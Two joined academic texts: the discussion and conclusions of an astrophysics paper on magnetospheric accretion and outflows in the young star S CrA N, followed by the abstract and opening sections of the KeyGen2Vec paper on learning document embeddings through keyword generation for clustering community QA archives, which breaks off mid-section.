truncated to consider only the modes where \(l\leq 10\) and reproduced the LSD \(V\) profiles between -25 km/s and +25 km/s. The reconstructed \(V\) profiles are over-plotted to the observed LSD \(V\) profiles along with the derived magnetic maps in Fig. 11. The three maps represent the projection of the magnetic vector on the spherical basis, which translates into a radial field (positive polarity meaning a vector going out of the surface), azimuthal field (positive polarity meaning a vector oriented clockwise), and meridional field (positive polarity meaning a vector oriented toward the South direction). We represent on each map the rotation phases at which each observation is obtained, with the initial phase \(\phi=0\) corresponding to the first date of observation. The large-scale magnetic field best reproducing our Stokes V profiles is as strong as 5.4 kG (which is within the weak-field approximation validity domain), with a mean intensity of 950 G, and a global axisymmetry of 68%. The poloidal component of this field (82% of the total energy) is primarily located in the dipolar component, which represents 27% of the total magnetic energy, even though higher order poloidal modes are significantly present (up to 25% and 16% of the total magnetic energy for the quadrupole and the octupole, respectively). This dipole's maximum intensity (816 G) is reached at intermediate latitude (56\({}^{\circ}\)), at phase 0.29. The main magnetic properties of the system are listed in Table 4. \begin{table} \begin{tabular}{l c} \hline \hline Property & Value \\ \hline Maximum intensity & 5.4 kG \\ Mean intensity & 950 G \\ Axisymmetry\({}^{a}\) & 68 \% \\ \hline **Toroidal field\({}^{a}\)** & **18\%** \\ Axisymmetry\({}^{b}\) & 41 \% \\ \hline **Poloidal field\({}^{a}\)** & **82\%** \\ Axisymmetry\({}^{c}\) & 73 \% \\ Dipole\({}^{c}\) & 33 \% \\ Maximum intensity & 816 G \\ Pole’s location\({}^{d}\) [lat; phase] & [56\({}^{\circ}\); 0.29] \\ Quadrupole\({}^{c}\) & 30 \% \\ Octupole\({}^{c}\) & 19 \% \\ \hline \end{tabular} 1 \end{table} Table 4: Main magnetic field properties from ZDI. Figure 10: Correlation matrices in He I (top row): auto-correlation of the full Helium line at 587.6 nm (left), correlation between the He I NC and the \(V\) profile (middle), and correlation between the He I BC and the \(V\) profile (right). Correlations matrices in H\(\alpha\) (bottom row): auto-correlation of the full H\(\alpha\) line (left), correlation between the H\(\alpha\) line and the full He I line (middle), and correlation between the H\(\alpha\) line and the He I \(V\) profile (right). The dashed black contours show the 2\(\sigma\) significance level. The average profiles are represented on the bottom and left side of each panel (solid black line) and are surrounded by their standard deviation (light blue shade), with the continuum level shown with dashed black lines. ## 4 Discussion ### S CrA N: a strong accretor? Typical CTTS have effective temperatures between 3000 and 5000 K, (spectral type G or later), masses most generally between 0.3 and 1 M\({}_{\odot}\), with an upper limit of about 2 M\({}_{\odot}\), and mass accretion rates of the order of 10\({}^{-7}\)-10\({}^{-10}\) M\({}_{\odot}\) yr\({}^{-1}\). They probe the end of the fully convective Hayashi phase of the pre-main sequence evolution, around ages of 1 to 2 Myr (e.g. Herczeg & Hillenbrand, 2014; Villebrun et al., 2019; Nicholson et al., 2021). When fitting our ESPaDOnS spectra, we found an effective temperature for S CrA N of 4300 \(\pm\) 100 K, in agreement with the previous determinations (Table 2). We used the Gaia DR3 data and applied the method of Galli et al. (2020) to derive the distance to S CrA N (see Appendix C). We adopted a value of d = 152.4 \(\pm\) 0.4 pc. We used the luminosity \(L_{*}\) = 1.67 \(\pm\) 0.8 \(L_{\odot}\) from Prato et al. (2003), corrected with our new distance to place S CrA N in the Hertzsprung-Russell diagram. Using the CESAM evolutionary model (Morel & Lebreton, 2008; Marques et al., 2013), we estimated a mass \(M_{*}\) = 0.8 \(\pm\) 0.1 M\({}_{\odot}\) and stellar radius \(R_{*}\) = 2.3 \(\pm\) 0.6 \(R_{\odot}\), which gives \(\log g\) = 3.6 \(\pm\) 0.2. The star is placed at an age of about 1 Myr, i.e. younger than typical CTTS. As most of the CTTS, S CrA N is then fully convective. The photospheric lines of CTTS generally appear shallower than those of non-accreting stars, suggesting an excess of continuum emission. This so-called veiling can be observed in different regions of the spectrum of CTTS, with different interpretations: in the near-infrared range, this excess might be attributed to the dust emission of the protoplanetary disk (Sousa et al., 2023); in the ultraviolet-visible range, this excess is attributed to an accretion shock that behaves like a \(\sim\) 8 000 K blackbody continuum emission that superimposes to the photospheric continuum. In very active stars, emission lines spectra may also blend the photospheric lines as early discussed in, e.g., Bertout (1984) and shown in, e.g., Petrov et al. (2011); Dodin & Lamzin (2012); Rei et al. (2018). This veiling of optical spectral lines is typically lower than 2 around 5500 A (Basri & Batalha, 1990; Hartigan et al., 1991). In S CrA N, we found no trend between wavelength and the veiling, which happens to be strongly variable around 5500 A with values ranging from 2 to 11. This finding is consistent with that of Sullivan et al. (2019), who also detected a strong variability and a large amplitude (between 2-6) of veiling in the near-infrared range. Combined with its young age, this evidence of very strong accretion could indicate an evolutionary stage between Class I and Class II for S CrA N. This is further confirmed by the place of the S CrA system in the color-color diagram proposed by Koenig & Leisawitz (2014). With All-WISE measurements \(W1=5.1\pm 0.1\), \(W2=4.0\pm 0.1\) and \(W3=2.08\pm 0.01\), the binary system lands at the frontier between protostars and T Tauri stars2. Footnote 2: With All-WISE, S CrA N is observed together with S CrA S, due to the angular resolution of the observations (\(\sim\) 6”). Since the two components are coeval (Gahm et al., 2018), this does not affect the interpretation regarding their young age. ### The magnetosphere From its fundamental parameters, S CrA N can be pictured as a young, fully convective T Tauri star. Should the surface magnetic field of CTTS be controlled by their internal structure only, we might expect a strong (\(\sim\)1 kG) axisymmetric large-scale field, mostly poloidal, with a strong dipole relative to higher poloidal modes (Gregory et al., 2012). This expectation is only partially met by the magnetic maps obtained in Section 3: the total field is mostly (82%) a poloidal field that is axisymmetric (73%), with a strong (816 G) dipole. However, the dipole and the quadrupole represent a similar portion of the poloidal field (33% and 30%, respectively), while the octupole's contribution is smaller, but still significant (19%). Our uncertainties on the luminosity may be the reason for this difference between the prediction and the reconstructed maps, but it should be noted that this region of the H-R diagram is observationally found to be populated with a variety of magnetic topologies (Donati et al., 2020; Nicholson et al., 2021). It is also worth reminding that S CrA N is a strong accretor, and that the possible impact of accretion on the inner structure of stars is still to be explored. We estimate the truncation radius (i.e. radius at which the magnetic pressure equals the ram gas pressure) from this magnetic reconstruction, using the formula from Bessolaz et al. (2008): \[\frac{R_{t}}{R_{*}}\simeq 2\,R_{*}^{4/7}\,\dot{M}^{-2/7}\,M_{*}^{-1/7}\,R_{*}^{5/7}, \tag{3}\] Figure 11: Polar projection of the magnetic maps (right) reconstructed from the LSD \(V\) observations (left, coloured lines). Black crosses over-plotted to the LSD profiles show the reconstructed \(V\), on the right of which the cycle number and phase are mentioned. The red ticks surrounding each map show the observed phases, going increasingly clockwise, starting from the South direction. Dashed black circles show co-latitudes of 27\({}^{\circ}\) (i), 63\({}^{\circ}\) (90-i) and 117\({}^{\circ}\) (90+i). The solid black line shows the equator. where the stellar field in the equatorial plane \(B_{\ast}\) (i.e., half the dipole's maximum intensity) has been normalised to 140 G, the accretion rate \(\dot{M}\) to \(10^{-8}\) M\({}_{\odot}\) yr\({}^{-1}\), the stellar mass to 0.8 M\({}_{\odot}\), and the stellar radius to 2 R\({}_{\odot}\), and where a Mach number of \(\sim 1\) has been assumed. Since the ESPaDOnS data are not flux-calibrated, we estimated the accretion rate thanks to the width of H\(\alpha\) at 10% peak intensity using the relationship from Natta et al. (2004): \[\log\dot{M}_{\rm acc}=-12.89(\pm 0.3)+9.7(\pm 0.7)\times 10^{-3}\ {\rm H}\alpha 1 0\%, \tag{4}\] where H\(\alpha\)10% is the considered width in km/s, and \(\dot{M}_{\rm acc}\) is in M\({}_{\odot}\) yr\({}^{-1}\). With widths ranging from 579 km/s to 693 km/s, we obtained accretion rate logarithms between -7.3 and -6.2 with a median value \(\log\dot{M}_{\rm acc}\ =-6.9\pm 0.7\), which is consistent with the value of \((1.0\pm 0.1)\times 10^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\) from Sullivan et al. (2019), when correcting the distance. Because they use the Br\(\gamma\) line to derive this accretion rate, we considered this value as more reliable than our own (see Alcala et al., 2014) to compute the truncation radius. Combined with the stellar radius and mass, and the magnetic topology from the present work, we obtained: \[R_{t}=2.1\pm 0.4\ R_{\ast}, \tag{5}\] where the uncertainty is derived from the propagation of errors on the involved parameters through Eq. 3. This value is likely a lower boundary for the truncation radius since the ZDI technique is blind to the magnetic field in the region of formation of the emission lines, leading to inconsistency between our reconstructed maps and the direct diagnoses of accretion, as shown below. The derived truncation radius implies a colatitude of the accretion spot of \(44^{\circ}\pm 5^{\circ}\) in a purely dipolar accretion model, which is consistent with the derived obliquity of the dipole from ZDI (\(56^{\circ}\)). However, both values seem to contradict the very high apparent latitude of the post shock region as traced by the He I NC radial velocity curve (Fig. 6-top). The single spot model from Pouilly et al. (2021) applied to these data gives a latitude of \(86^{\circ}\pm 1^{\circ}\). The asymmetry of the NC attributed to a velocity gradient in the post-shock region does not vary with phase, which is also supportive of a spot located at high latitude. The magnetic field projected along the line of sight (or longitudinal magnetic field \(B_{l}\)) associated with the NC of He I is positive at all phases (see Fig.6-bottom, Table 3). If one assumes that the NC is arising from the post-shock region, this means at least part of the total magnetic field should be positive near the pole of the star, as shown earlier. However, the magnetic maps reconstructed from ZDI (Fig. 11) show that regions with a positive magnetic field (i.e. coming towards the observer) at virtually every phase are only present in colatitudes larger than \(\sim 60^{\circ}\), which corresponds to a portion of the star occasionally visible only (outside the second dashed black ring). This discrepancy leads us to consider the tomographic reconstructions presented in this work as not definite. Additional developments considering this emission line or any other line constraining a different region than the LSD profiles (e.g., Ca II infrared triplet (IRT), Fe II 42 multiplet) are required to combine the different constraints in a single tomographic reconstruction (such as in Donati et al., 2020), which is beyond the scope of this paper. Finally, from this truncation radius, one can also deduce the expected accretion velocity \(v_{\rm acc}\) (i.e. the velocity of the gas free-falling from the truncation radius onto the stellar surface) thanks to energy conservation. This gas is producing the AC observed in He I (Fig. 5), the higher members of the Balmer series (Fig. 9) and FeII (Fig. B.1). Thanks to our estimate of stellar mass and radius, we obtain \(v_{\rm acc}=267\) km.s\({}^{-1}\). This velocity is included in the range of velocities of the AC, which makes the value of \(R_{t}\) derived from ZDI consistent with our values of \(M_{\ast}\) and \(R_{\ast}\). However, the maximum velocity of the AC is larger than the free-fall velocity from infinity (\(v_{\infty}=370\) km.s\({}^{-1}\)), which points out either a wrong estimate of \(M_{\ast}\) and \(R_{\ast}\), or a significant broadening of these absorptions, the source of which remaining unknown. ### An unstable accretion regime? The observed intensity and variability of various emission lines (He I, Fe II, Ca II, for instance; see Appendix B), combined with the highly veiled photospheric lines, suggest that intense accretion processes occur in the vicinity of S CrA N. One way to better constrain the accretion process is to compare the corotation radius and the truncation radius. Indeed, when the truncation to corotation radii ratio becomes small enough, Rayleigh-Taylor instability can be triggered at the magnetosphere-disk boundary (Kulkarni & Romanova, 2008). Then, magnetospheric accretion enters the so-called unstable accretion regime, where classical accretion funnels are observed, but also accretion tongues. This phenomenon and its observable signatures have been extensively modeled (Kurosawa & Romanova, 2013; Blinova et al., 2016) and has recently been reproduced in laboratory experiments that scale to the expected YSOs' accretion tongues (Burdonov et al., 2022). Blinova et al. (2016) observed unstable accretion for simulations where \(R_{t}/R_{\rm co}<0.71\), for obliquities lower than \(20^{\circ}\). With the set of stellar parameters we derived (see Table 2) we computed a corotation radius of \(R_{\rm co}=6.4\pm 1.7\) R\({}_{\ast}\), which yields a truncation to corotation radii ratio \(R_{t}/R_{\rm co}=0.33\ \pm\ 0.11\), and places S CrA N in the unstable accretion scenario. The simulations from Kurosawa & Romanova (2013) showed that a proxy to the accretion regime lies in the profiles of the higher members of the Balmer series (\(H\gamma\) and \(H\delta\)): in the stable case, a red-shifted absorption appears for about half the rotation cycle, before it disappears, coming and going with stellar periodicity. This absorption is due to the visible accretion funnel which is absorbing the star's continuum while it remains in the line of sight. In the unstable case, this red-shifted absorption is expected to be present at virtually every phase of the rotation cycle, since there is at least one accretion tongue in the line of sight at all time. The profiles of \(H\gamma\) and \(H\delta\) we observe in S CrA N display this absorption at all phases as seen in Fig. 9, in agreement with unstable accretion. ### Accreting structures This unstable accretion regime sets a new context for the interpretation of the features observed in the emission lines presented earlier. The He I \(\lambda 5876\) NC likely arises from a post-shock region in a single accretion spot located at high latitudes (\(\sim 86^{\circ}\)). The origin in a post-shock region is suggested by the small radial velocity of the flow producing the NC (\(\sim 2\) km/s, see Sec.4.2). The single-spot model is corroborated by the consistency between the periodicity of the Stokes V signatures (both in the LSD profiles and the He I line) and the periodicity of the He I NC profiles. The longitudinal field's curve in the He I line displays a complex modulation, with a substantial departure from the sine model near the extreme radial velocities, around phases 0.3 and 0.9 (see Fig. 6). That could be explained if the star has a complex magnetic field, significantly differing from a simple dipole as suggested by ZDI from the present work. Finally, the asym metry of the NC in Stokes \(I\) (steep blue wing and mild red wing; see Fig. 5) and the departure from anti-symmetry in Stokes \(V\) (blue lobe stronger than red lobe) would come from the velocity gradient in the region of emission. This asymmetry is observed at all phases with no noticeable modulation, suggesting a high latitude for the accretion spot. We speculate that the red-shifted AC seen in He I \(\lambda\)5876, \(H\gamma\), and \(H\delta\) is formed in two distinct structures: first, in an accretion funnel located around phase 0.2 (called the "main" column hereafter), which produces the NC at its footprint, when forming an accretion shock; then, in another accretion column located around phase 0.7 (called the "secondary" column hereafter, opposed to the main one), which does not have any NC counterpart, because its density is much smaller than in the main column, where accretion is favoured, due to the magnetic misalignment. An AC is nonetheless produced by the free-falling material of the secondary column which absorbs the light emerging from the photosphere. These opposite structures then produce an artificial periodicity of half the stellar period (\(P_{*}/2=3.65\simeq 3.4\pm 0.4\) days, see Fig. 8), the actual stellar period being detected for the lowest velocities of the AC (\(P_{*}=7.3\simeq 6.6\pm 1.3\) days), because only the main accretion column is dense enough at small velocities (i.e., in the upper part of the column) to produce an absorption. Finally, the He I \(\lambda\)5876 BC is most likely formed by the infalling gas in both the main and the secondary funnels, since the same artificial periodicity as the AC is observed, and its centroid is mostly red-shifted. As discussed in Beristain et al. (2001), this tendency in the central velocity of the line can be obtained with material following a purely dipolar field at polar angles lower than 54.7\({}^{\circ}\) which corresponds to accreting gas. ### Outflows Lima et al. (2010) modeled the H\(\alpha\) line in the case of a CTTS undergoing both magnetospheric accretion and a disk wind. When comparing the H\(\alpha\) lines we observed (Fig. 9) with their grids of models, the deep blue-shifted absorption of our profiles appears to be well reproduced with their models combining a high accretion rate (10\({}^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\)), and a hot (\(\sim\) 8000-10000 K) disk wind with a density of a few 10\({}^{-11}\) g/cm\({}^{3}\) and an outer radius of a few tens of stellar radii (see their Figs. 4 and 6). It should be noted that their model reproduces the bulk of the absorption, but not the variable features seen at small velocities. We guess that these features are coming from disk outflows because of their moderate correlation with accretion signatures (namely, the He I NC and He I AC) as seen in Fig. 10. Numerical simulations (Romanova et al., 2009; Zanni and Ferreira, 2013; Pantolmos et al., 2020) have shown that the stellar magnetic field lines threading the disk outside the accretion columns are open, further producing transient ejections (i.e., magnetospheric ejections/conical winds) and/or disk winds. These outflows are also suspected when comparing the truncation radius we computed with the size of the region emitting the hydrogen \(Br\gamma\) line in S CrA N. This region can be spatially constrained to \(R_{Br\gamma}=7.7\,\pm 2.2\,R_{*}\) thanks to interferometric observations (GRAVITY Collaboration et al., 2017; Gravity Collaboration et al., 2023). The given value is an update from Gravity Collaboration et al. (2023) with our new values for distance and \(R_{*}\). Since \(R_{Br\gamma}\) extends well beyond \(R_{*}=2.1\,\pm 0.4\,R_{*}\), disk outflows must account for part of the emission observed in this line. Finally, the Herbig-Haro object HH729 has been attributed to S CrA N (Peterson et al., 2011). The forbidden lines of [\(OI\)] at 6300.2 A and 6363.8 A and [\(SII\)] at 6730 A are usually interpreted as tracers of outflows at different scales (see e.g. Alexander et al., 2014; Pascucci et al., 2020; Gangi et al., 2023). These lines are present in the spectra of S CrA N with a strong blue-shifted peak (\(\sim\) -120 km/s) and asymmetry (see Appendix B for the profiles), strengthening the idea of a large-scale outflow arising from the inner regions. ## 5 Conclusions Thanks to spectropolarimetric observations in the optical range with ESPaDOnS at CFHT, we have probed the star-disk interaction in the innermost regions of the North component of the young binary system S CrA. With its confirmed high accretion rate (10\({}^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\)), this object is an ideal target for studying the magnetospheric accretion scenario in a stronger regime than in CTTS. Our major findings are summarized below: * When fitting the ESPaDOnS spectra and using CESAM evolutionary models, S CrA N appears to have a mass of 0.8 M\({}_{\odot}\), to be fully convective, and about 1 Myr old. As in previous determinations in the near-infrared range, the veiling we derive around 5500 A is strongly variable and high (i.e., ranging from 2 to 11), which suggests that the star experiences a strong accretion regime. Combined with the young age, this could indicate an evolutionary stage between Class I and Class II. * This evolutionary stage is also in line with the large-scale magnetic field we have reconstructed through ZDI. We obtained a total field as strong as 5.4 kG and not strongly axi-symmetric, whose dipolar contribution represents about a third of the total field. Higher poloidal orders being significant (\(\sim\) 50%), the large-scale topology of the magnetic field appears rather complex, when compared with CTTSs. * Additional developments are needed to paint a complete and coherent view of the magnetic topology of S CrA N by including the constraints from the emission lines (such as He I, the Ca II IRT or the Fe II 42 multiplet) and developing more complex models to reproduce the emitting regions of these lines and their properties. * We derive a magnetic truncation radius of \(\sim 2\,R_{*}\), and a corotation radius of \(\sim 6\,R_{*}\), suggesting that S CrA N is in an unstable accretion regime. Looking at the Helium and Hydrogen line profiles and periodicities, we suggest that this accretion occurs in an unstable scenario, along two distinct accretion structures: one main accretion column associated with the accretion shock, and a secondary accretion column with much less density in it as to produce no detectable accretion shock. * The emission lines of the hydrogen Balmer series are highly variable and display multi-component profiles. The observed H\(\alpha\) line profiles exhibit clear signatures of an outflow and are in good agreement with simulations of a hot and dense disk wind. This finding is compatible with the size of the \(Br\gamma\) emitting region measured with GRAVITY (\(\sim 8\,R_{*}\)) which is substantially larger than the truncation radius. Our spectropolarimetric campaign in the optical allows us to characterize the star-disk interactions at play in the innermost regions of S CrA N and, when combined with near-infrared interferometry, to provide a consistent view of these complex and variable regions. Given the strong and unstable accretion regime, probing the accretion-ejection processes would benefit from a temporal follow-up of these phenomena through simultaneous observations combining photometry, spectroscopy, and interferometry in various spectral ranges. ###### Acknowledgements. This work is supported by the French National Research Agency in the framework of the "investigsentiments d'avenir" program (ANR-15-IDEX-02). This work has made use of data from the European Space Agency (ESA) mission _Gaia_[https://www.cosmos.esa.int/gaia/](https://www.cosmos.esa.int/gaia/), processed by the _Gaia_ Data Processing and Analysis Consortium (DPAC, [https://www.cosmos.esa.int/web/gaia/apac/consortium](https://www.cosmos.esa.int/web/gaia/apac/consortium)). Funding for the DPCA has been provided by national institutions, in particular the institutions participating in the _Gaia_ Multilateral Agreement. This work has made use of the VALD database, operated at Uppsala University, the Institute of Astronomy RAS in Moscow, and the University of Vienna. Finally, we address our greatest thanks to the referee of this article for their fruitful suggestions and comments.
2310.19650
KeyGen2Vec: Learning Document Embedding via Multi-label Keyword Generation in Question-Answering
Representing documents into high dimensional embedding space while preserving the structural similarity between document sources has been an ultimate goal for many works on text representation learning. Current embedding models, however, mainly rely on the availability of label supervision to increase the expressiveness of the resulting embeddings. In contrast, unsupervised embeddings are cheap, but they often cannot capture implicit structure in target corpus, particularly for samples that come from different distribution with the pretraining source. Our study aims to loosen up the dependency on label supervision by learning document embeddings via Sequence-to-Sequence (Seq2Seq) text generator. Specifically, we reformulate keyphrase generation task into multi-label keyword generation in community-based Question Answering (cQA). Our empirical results show that KeyGen2Vec in general is superior than multi-label keyword classifier by up to 14.7% based on Purity, Normalized Mutual Information (NMI), and F1-Score metrics. Interestingly, although in general the absolute advantage of learning embeddings through label supervision is highly positive across evaluation datasets, KeyGen2Vec is shown to be competitive with classifier that exploits topic label supervision in Yahoo! cQA with larger number of latent topic labels.
Iftitahu Ni'mah, Samaneh Khoshrou, Vlado Menkovski, Mykola Pechenizkiy
2023-10-30T15:35:45Z
http://arxiv.org/abs/2310.19650v1
# KeyGen2Vec: Learning Document Embedding via Multi-label Keyword Generation in Question-Answering ###### Abstract Representing documents into high dimensional embedding space while preserving the structural similarity between document sources has been an ultimate goal for many works on text representation learning. Current embedding models, however, mainly rely on the availability of label supervision to increase the expressiveness of the resulting embeddings. In contrast, unsupervised embeddings are cheap, but they often cannot capture implicit structure in target corpus, particularly for samples that come from different distribution with the pre-training source. Our study aims to loosen up the dependency on label supervision by learning document embeddings via Sequence-to-Sequence (Seq2Seq) text generator. Specifically, we reformulate keyphrase generation task into multi-label keyword generation in community-based Question Answering (cQA). Our empirical results show that **KeyGen2Vec** in general is superior than multi-label keyword classifier by up to 14.7% based on Purity, Normalized Mutual Information (NMI), and F1-Score metrics. Interestingly, although in general the absolute advantage of learning embeddings through label supervision is highly positive across evaluation datasets, **KeyGen2Vec** is shown to be competitive with classifier that exploits topic label supervision in YahoocQA with larger number of latent topic labels. 1 Footnote 1: The empirical study was completed in 2020 at Eindhoven University of Technology. semantic knowledge for document clustering can be divided into two: (1) approaches that focus on improving the quality of document embeddings during training [21, 14]; and (2) approaches that focus on improving the clustering algorithm or subsequent tasks by providing additional post-pipelines [1, 13, 12] to intensify the expressiveness of representations in latent space, such that semantically similar points in that space are close together compared to dissimilar points. However, these works depend on multiple pipelines, which consequently hinder their reproducibility and adaptation as end-to-end system in many real world NLP applications. Our work mainly focuses on topical clustering of cQA archives as a subsequent task to evaluate currently available document embedding approaches, including the proposed **KeyGen2Vec** framework. As a motivating example, Figure 0(a)-0(b) illustrate how unsupervised-based embeddings are likely random, indicating the model's incapability to capture semantic aspects such as latent topics structure inferred in target data. By contrast, supervised approach is more expressive, producing separable clusters in latent space that are coherent with topics, as shown in Figure 0(c)-0(d). However, the latter model requires learning document embeddings with topics as label supervision. So, it is more costly than the unsupervised embedding approaches. To negotiate the trade-offs between utilizing unsupervised and supervised approaches for learning document embeddings, we utilize keywords as sub-latent structure in corpora to train Seq2Seq networks referred to as **KeyGen2Vec**. Our work holds an assumption that learning a conditioned sequence-to-sequence mapping between documents and their corresponding keywords equals to learning the structural similarity that hierarchically links contents in document, keywords as explicit document abstractions, and topics as latent variables that further group documents based on keywords co-occurrences. For a fair comparison, we also train Multi-label and Multi-class Neural Network classifiers as supervised approaches to learn document embeddings on cQA data. The main difference between our proposal and classifier-based approaches is that the classifiers view keywords and topics as discrete labels \(Y\in R^{d}\), while the proposed **KeyGen2Vec** sees keywords as a sequence of discrete structure \(Y\in\Sigma^{*}\). Summarizing, **our main contributions** are: * We introduce **KeyGen2Vec**, a simple Seq2Seq framework that can be utilized as a general tool to learn document embeddings conditioned on sub-topics information, such as keywords. * We comprehensively investigate currently available approaches for learning document embeddings We empirically show that unsupervised approaches often produce clusters that are incoherent with hidden semantics or latent structure inferred in target data. * We empirically show that training Seq2Seq networks on multi-label keyword generation is analogous to indirectly incorporating label dependency assumption. We demonstrate that the proposed **KeyGen2Vec** is superior than a classifier that is trained on multi-label classification task with document source as inputs and keywords as target outputs for the models. ## 2 Background ### Community-based Question Answering Our study focuses on investigating the potential usefulness of state-of-the-art document embeddings Figure 2: **KeyGen2Vec. Model is trained in _autoregressive_ mode. In teacher forcing mode, \(t-1\) shifted version of keyword is given to the model as input for decoder. Circles represent RNN states in encoder (left/source) and decoder (right/target) network.** for clustering cQA archives with topics as latent structural similarity. Most of previous studies on cQA archives are centralized on the exploration of **retrieval** issues, such as learning latent topics for question retrieval Cai et al. (2011), a retrieval framework with neural network embedding P et al. (2017), hybrid approach of neural network and latent topic clustering to rank the candidate answers given question Yoon et al. (2018); and **textual similarity** problems between questions and their candidate answers Wang et al. (2010); Tan et al. (2016); Yang et al. (2018). Whereas, previous works on **clustering** cQA archives mainly focus on improving clustering algorithm based on simple feature extractor method (e.g. TfIdf) Momatzi and Klakow (2009); P (2016). **Topical clustering** itself is previously studied by Rosa et al. (2011) to organize large unstructured twitter posts into topically coherent clusters with hashtags as a means of guidance. ### Document Embedding Our study on currently available document embeddings is constrained on approaches that are domain independent. Since most space is devoted to the proposed framework and model evaluation, we refer the future readers to the original papers. Figure 3 shows document embedding approaches that are being observed in this study, which we broadly divided based on three categories: (1) Non-distributed (frequency-based) approach; (2) Probabilistic approach; and (3) Distributed (neural-based) embedding learning. The property of each embedding model is briefly described in Table 1. For a fair comparison, we include methods that learn embeddings based on global semantic structure (**GLO**), sub-semantic structure (**SUB**), sequential assumption (**SEQ**), pretrained embeddings (**PRE**), and directly trained embeddings on the target corpus (**TRA**). \begin{table} \begin{tabular}{l|l|c c c c c} \hline \hline No & Model & GLO & SUB & SEQ & PRE & TRA & DIM \\ \hline 1 & **KeyGen2Vec** & - & ✓ & ✓ & - & ✓ & 200 \\ 2 & S2S-AE & - & - & ✓ & - & ✓ & 200 \\ 3 & **FC-Mult-Cls\({}^{\ast}\)** & ✓ & - & - & - & ✓ & 100 \\ \hline 4 & Sign-Mult-Lbl & - & ✓ & - & - & ✓ & 100 \\ 5 & Soft-Mult-Lbl & - & ✓ & - & - & ✓ & 100 \\ 6 & S-BERT & - & - & - & ✓ & - & 768 \\ 7 & LDA-Topic & - & - & - & - & ✓ & * \\ 8 & D2V-DBOW & 100 & - & - & - & ✓ & 100 \\ 9 & D2V-PVDM100 & - & - & - & ✓ & 100 \\ 10 & Avg-GloVe100 & - & - & - & ✓ & - & 100 \\ 11 & Avg-v2v100 & - & - & - & ✓ & - & 100 \\ 12 & Avg-GloVe300 & - & - & - & ✓ & - & 300 \\ 13 & Avg-v2v300 & - & - & - & ✓ & - & 300 \\ 14 & Avg-v2v50-tr-sm & - & - & - & ✓ & 50 \\ 15 & Avg-v2v50-tr-lg & - & - & - & ✓ & 50 \\ 16 & Avg-PMI50 & - & - & - & ✓ & 50 \\ 17 & DC-GloVe100 & - & - & - & ✓ & - & \(100^{2}/2\) \\ 18 & DC-w2v100 & - & - & - & ✓ & - & \(100^{2}/2\) \\ 19 & DC-PMI50 & - & - & - & - & ✓ & \(50^{2}/2\) \\ 20 & DC-w2v50-tr-lg & - & - & - & ✓ & \(50^{2}/2\) \\ 21 & TfIdf & - & - & - & - & ✓ & **?** \\ \hline \hline \end{tabular} \end{table} Table 1: Properties of models compared in this study: **GLO**: Global semantics (topic labels) are exposed to the model; **SUB**: Sub-semantic structures (keywords) are exposed to the model; **SEQ**: Model with sequential assumption; **PRE**: Use pretrained embedding - no finetuning; **TRA**: training on observed corpus; **DIM**: Dimension of embeddings; \({}^{\ast}\) depends on the chosen hyper-parameter (\(N\) topics) ; \({}^{\ast}\)\({}^{\ ## 3 KeyGen2Vec Framework **KeyGen2Vec** is built based on a hierarchical semantic assumption of a corpus, as briefly illustrated in Figure 4. The assumption is that documents and their corresponding keyword labels form sub-structures or _sub-networks_ of latent topic structure as global semantics. Our work adopts Seq2Seq-based keyphrase generation introduced by Meng et al. (2017); Chen et al. (2018). While these preliminary works are motivated by the intuition of Seq2Seq capturing document semantics, there is currently neither analysis nor empirical evidence to support the claim that the learnt context representation has encapsulated latent semantic concept of document source conditioned on its keyword labels. We hypothesize that Seq2Seq network that has been trained on a keyword generation task is capable of capturing such latent semantic structure inferred in data. Figure 5 illustrates the reformulation of multi-label keyword generation as the training objective of **KeyGen2Vec**. The objective of the task is to approximate the mapping function \(f:X\mapsto Y\) - where \(X\) denotes a collection of documents and \(Y\) denotes the corresponding set of keywords in observation set. These sets of observations \(\{(x_{i},\{y_{i}^{1},y_{i}^{2}\})\}\) were transformed into one-to-one training examples \(\{x_{i},y_{i}^{1}\},\{x_{i},y_{i}^{k}\}\) (fig. 4(b)). Each training example is represented as sequences, \(\mathcal{X}:\Sigma^{*}\) and \(\mathcal{Y}:\Sigma^{*}\). In inference stage, to evaluate how well the trained Seq2Seq capture the semantic structure inferred in \(f\), the parameterized encoder decoder model \(g\) was further utilized as a decoder framework, to generate keywords given unseen documents. Details of architecture used is further explained in sec.3.1. ### Architecture Our framework is built based on a standard Sequence-to-Sequence (Seq2Seq) encoder-decoder framework. An encoder first maps a sequence of words to a vector \(c\) - where \(c\) serves as the resulting document embedding. Given the encoded embedding of document source \(c\), the decoder then generates target sequences. \[\texttt{ENC}\!:\!x =\{w_{1},\dots,w_{T_{x}}\}\mapsto c\in\mathbb{R}^{d}\] \[\texttt{DEC}\!:\!c \in\mathbb{R}^{d}\mapsto y=\{w_{1},\dots,w_{T_{y}}\}\] EncoderThe encoder network is constructed of bidirectional GRU units for mapping sequence of embedded words \(e_{t\dots T_{x}}\) into a sequence of intermediate state representation \(h_{t\dots T_{x}}\), which is a concatenation of forward and backward hidden states \(h_{t\dots T_{x}}=[\overrightarrow{h},\overrightarrow{h}]\). \[\overrightarrow{h_{t\dots T_{x}}} =\overrightarrow{GRU}(e_{t\dots T_{x}})\] \[\overleftarrow{h_{t\dots T_{x}}} =\overleftarrow{GRU}(e_{t\dots T_{x}})\] DecoderThe decoder is a neural language model based on forward GRU network that conditions on context embedding of encoder \(c\). \(s_{t-1}\) is decoder state at previous time step. \(y_{t-1}\) denotes prediction at \(t-1\). Here, \(g(.)\) denotes prediction layer (dense network) with softmax activation function. \[s_{t}=\overrightarrow{\text{GRU}}(y_{t-1},s_{t-1},c)\] \[p(y_{t}|y_{1,\dots,t-1},x)=g(y_{t-1},s_{t},c)\] AttentionWe use Bahdanau's MLP attention scoring function (Bahdanau et al., 2014) to calculate attention score \(\alpha\) corresponds to the importance weight of words in source sequence given embedding of words in target sequence. \[\alpha_{t}=\frac{exp(score(s_{t}^{(j)},h_{t\dots T_{x}}^{(i)}))}{\sum_{t}^{T_{ x}}exp(score(s_{t}^{(j)},h_{t\dots T_{x}}^{(i)}))}\] Figure 4: Corpus as hierarchical semantic network of documents, keywords, and topics. Figure 5: Training and Inference stages of the proposed KeyGen2Vec; (a) Observation set; (b) Training; (c) Prediction in test set; \(c\) is latent topic. Context (Document) EmbeddingsThe final document embedding \(c\) is computed based on weighted sum between a sequence of encoder states and attention score. \[c_{t}=\sum_{t=1}^{T_{x}}\alpha_{t}h_{t}\] ### On Label 